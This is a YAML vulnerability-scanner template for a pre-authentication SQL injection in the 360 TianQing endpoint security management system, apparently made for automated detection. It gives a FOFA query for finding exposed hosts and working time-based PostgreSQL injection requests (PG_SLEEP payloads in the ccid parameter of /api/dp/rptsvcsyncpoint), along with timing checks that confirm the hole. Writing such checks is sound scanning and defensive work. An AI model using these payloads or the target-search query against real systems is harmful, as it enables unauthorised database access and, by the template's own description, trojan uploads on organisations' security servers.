product: 360-TianQing
vName: 360天擎 rptsvcsyncpoint 前台SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 天擎 存在SQL注入,攻击者可以通过漏洞上传木马
version: 天擎
note: ''
search:
  FOFA: app="360天擎终端安全管理系统"
protocol: http
link: https://blog.csdn.net/qq_53003652/article/details/134327023
fix:
  - 升级到最新版本
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /api/dp/rptsvcsyncpoint?ccid=1%27;SELECT%20PG_SLEEP(5)--
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: '>='
            num: 5
  - exp:
      method: get
      follow: false
      path: /api/dp/rptsvcsyncpoint?ccid=1%27;SELECT%20PG_SLEEP(0)--
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          time:
            check: <=
            num: 3